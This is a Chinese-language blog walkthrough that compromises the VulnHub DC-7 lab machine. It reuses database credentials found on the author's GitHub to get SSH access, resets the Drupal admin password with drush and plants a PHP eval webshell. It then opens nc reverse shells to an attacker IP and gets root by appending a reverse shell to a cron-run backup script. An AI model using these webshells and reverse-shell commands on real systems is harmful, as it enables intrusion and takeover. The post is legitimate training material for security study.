VulnHub靶机 DC-7 打靶 详细渗透过程

2024-04-27 893 0

VulnHub靶机 DC-7 实战打靶 详细渗透过程

一、将靶机配置文件导入虚拟机当中

靶机地址:

https://www.vulnhub.com/entry/dc-7,356/

VulnHub靶机 DC-7 打靶 详细渗透过程插图

二、渗透测试流程

主机发现

使用arp-scan命令或者使用nmap命令进行主机发现

arp-scan -l

VulnHub靶机 DC-7 打靶 详细渗透过程插图1

端口扫描

nmap -p- 10.1.2.237

探测发现开放22端口SSH,80端口HTTP服务

VulnHub靶机 DC-7 打靶 详细渗透过程插图2

详细探测服务信息

nmap -p80 -sV -A 10.1.2.237

VulnHub靶机 DC-7 打靶 详细渗透过程插图3

目录爆破

发现后台

dirsearch -u http://10.1.2.237/ -i 200 

VulnHub靶机 DC-7 打靶 详细渗透过程插图4

VulnHub靶机 DC-7 打靶 详细渗透过程插图5

尝试sql注入并未成功

web渗透

白盒测试

指纹识别

whatweb http://10.1.2.237/

VulnHub靶机 DC-7 打靶 详细渗透过程插图6

访问web界面,通过界面提示,爆破是无法利用成功的,要跳出"盒子",说明可能是白盒测试

VulnHub靶机 DC-7 打靶 详细渗透过程插图7

VulnHub靶机 DC-7 打靶 详细渗透过程插图8

通过发现左下角有作者信息,那么来到github搜索一下,看有没有价值信息

VulnHub靶机 DC-7 打靶 详细渗透过程插图9

通过github找到作者,翻找源码找到config配置文件,打开查看内容

VulnHub靶机 DC-7 打靶 详细渗透过程插图10

找到配置文件config.php,其文件内容如下:

<?php
	$servername = "localhost";
	$username = "dc7user";
	$password = "MdR3xOgB7#dW";
	$dbname = "Staff";
	$conn = mysqli_connect($servername, $username, $password, $dbname);
?>

根据上述代码可得服务名称和用户名以及密码,还有数据库的名称,拿到以上信息尝试利用

后台登录:失败

VulnHub靶机 DC-7 打靶 详细渗透过程插图12

数据库连接:失败

VulnHub靶机 DC-7 打靶 详细渗透过程插图13

通过端口扫描发现还开放了22端口,尝试远程连接

ssh:成功

VulnHub靶机 DC-7 打靶 详细渗透过程插图14

ssh远程连接

ssh [email protected]

成功连接

VulnHub靶机 DC-7 打靶 详细渗透过程插图15

提权

查找系统具备suid权限的指令

find / -perm -u=s -type f 2>/dev/null

发现没有什么可利用的,但发现有一封邮件,查看有无讯息

VulnHub靶机 DC-7 打靶 详细渗透过程插图16

cat /var/mail/dc7user 

发现可执行脚本信息,以及数据库文件相关的信息

VulnHub靶机 DC-7 打靶 详细渗透过程插图17

逐一查看,查看执行备份的脚本

ls -l /opt/scripts/backups.sh
cat backups.sh

VulnHub靶机 DC-7 打靶 详细渗透过程插图18

VulnHub靶机 DC-7 打靶 详细渗透过程插图19

脚本属主为root,属组是www-data。

修改后台密码

通过脚本的内容,发现drush命令,对数据库进行了操作,以及打包备份操作。查一下drush相关命令内容

VulnHub靶机 DC-7 打靶 详细渗透过程插图20

VulnHub靶机 DC-7 打靶 详细渗透过程插图21

drush命令帮助如下:

VulnHub靶机 DC-7 打靶 详细渗透过程插图22

可以使用drush来修改密码,更换后台的密码

drush user-password admin --password="admin"

第一次使用报错,来到网站目录再次执行即可

VulnHub靶机 DC-7 打靶 详细渗透过程插图23

成功更改密码后,登录网站后台:

成功进行后台,来到插件位置,观察有无可代码执行或者getshell的地方

VulnHub靶机 DC-7 打靶 详细渗透过程插图24

GETSHELL

  • 在Content—>Add content-->Basic page下,准备添加PHP代码反弹shell,但发现Drupal 8不支持PHP代码。

  • VulnHub靶机 DC-7 打靶 详细渗透过程插图25

  • 百度后知道Drupal 8后为了安全,需要将php单独作为一个模块导入

  • PHP介绍页面如下,模块包下载地址附上

https://www.drupal.org/project/php
https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz

VulnHub靶机 DC-7 打靶 详细渗透过程插图26

安装新模块,将链接填入即可

等待过后,安装成功

VulnHub靶机 DC-7 打靶 详细渗透过程插图28

启用即可

VulnHub靶机 DC-7 打靶 详细渗透过程插图29

来到扩展,安装

VulnHub靶机 DC-7 打靶 详细渗透过程插图30

等待过后安装成功。

VulnHub靶机 DC-7 打靶 详细渗透过程插图31

回到home,点击edit编辑,直接写入一句话木马

<?php @eval($_POST['cmd']);?>

VulnHub靶机 DC-7 打靶 详细渗透过程插图32

写入后保存,注意选择php code

VulnHub靶机 DC-7 打靶 详细渗透过程插图33

然后直接使用蚁剑进行连接,成功解析php

VulnHub靶机 DC-7 打靶 详细渗透过程插图34

成功连接

VulnHub靶机 DC-7 打靶 详细渗透过程插图35

获取www-data权限

VulnHub靶机 DC-7 打靶 详细渗透过程插图36

反弹shell

//在虚拟终端当中执行反弹命令
nc -e /bin/bash 10.1.2.228 8888

kali成功接收shell,获取www-data权限

VulnHub靶机 DC-7 打靶 详细渗透过程插图37

获取稳定shell

python -c "import pty;pty.spawn('/bin/bash')"

VulnHub靶机 DC-7 打靶 详细渗透过程插图38

由于我们上一步骤已经得到了backups.sh脚本属主为root,属组为www-data,所以我们将反弹shell命令添加到脚本当中,等待执行脚本反弹shell即可得到root权限

//将反弹shell命令追加到文件当中
echo "nc -e /bin/bash 10.1.2.228 6666" >> backups.sh
或
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 10.1.2.228 6666 >/tmp/f" >> backups.sh

或者在webshell当中的文件管理直接写入

VulnHub靶机 DC-7 打靶 详细渗透过程插图39

查看文件内容,确认写入成功

VulnHub靶机 DC-7 打靶 详细渗透过程插图40

//直接执行或者等待计划任务执行即可

VulnHub靶机 DC-7 打靶 详细渗透过程插图41

kali端成功接收到shell,成功提权,通关!

VulnHub靶机 DC-7 打靶 详细渗透过程插图42

VulnHub靶机 DC-7 打靶 详细渗透过程插图43

思路:

主机发现---端口扫描---目录爆破发现后台---服务探测---白盒测试(源码当中找配置文件)---ssh远程登录---邮件信息---找到备份文件脚本---发现脚本当中的drush命令---修改后台密码---进入后台---寻找可代码执行或getshell地方---drupal8不允许执行命令(模块)---下载新的插件---getshell---反弹shell---追加反弹命令---提权即可

文章不妥之处,欢迎批评指正!


4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

相关文章

webpack打包站点,js文件名批量获取思路
加密对抗靶场enctypt——labs通关
【论文速读】| 注意力是实现基于大语言模型的代码漏洞定位的关键
蓝队技术——Sysmon识别检测宏病毒
内网渗透学习|powershell上线cs
LLM attack中的API调用安全问题及靶场实践

发布评论